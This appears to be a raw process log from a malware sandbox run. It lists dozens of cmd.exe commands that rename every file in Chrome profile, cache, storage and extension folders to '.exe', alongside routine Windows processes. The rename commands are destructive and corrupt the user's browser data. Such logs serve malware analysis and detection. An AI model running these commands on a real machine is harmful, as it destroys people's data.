C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\WebStorage\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage\802d6b00-90db-44ce-b9af-41d73536b55c\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_metadata\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\af\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\am\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\ar\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\az\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\be\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\bg\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\bn\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\ca\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\cs\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\cy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\da\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\de\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\el\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\en\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\en_CA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\en_GB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\en_US\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\es\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\es_419\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\et\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\eu\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\fa\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\fi\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\fil\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\fr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\fr_CA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\gl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\gu\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\hi\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\hr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\hu\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\hy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\id\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\is\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\it\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\iw\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\ja\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\ka\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\kk\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\km\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\kn\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\unregmp2.exe

C:\Windows\system32\unregmp2.exe /ShowWMP /SetShowState /CreateMediaLibrary

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\ko\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\lo\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\lt\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\lv\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\ml\*.*" "*.exe"

C:\Windows\system32\unregmp2.exe

"C:\Windows\SysNative\unregmp2.exe" /ShowWMP /SetShowState /CreateMediaLibrary /REENTRANT

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\mn\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\mr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\ms\*.*" "*.exe"

C:\Program Files (x86)\Windows Media Player\wmplayer.exe

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Relaunch

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\my\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\ne\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\nl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\no\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\pa\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\pl\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\pt_BR\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\pt_PT\*.*" "*.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\ro\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\ru\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\si\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\sk\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\sl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\sr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\sv\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\sw\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\ta\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\te\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\th\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\tr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\uk\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\ur\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\vi\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\zh_CN\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\zh_HK\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\zh_TW\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\zu\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ca\*.*" "*.exe"

C:\Windows\System32\cmd.exe

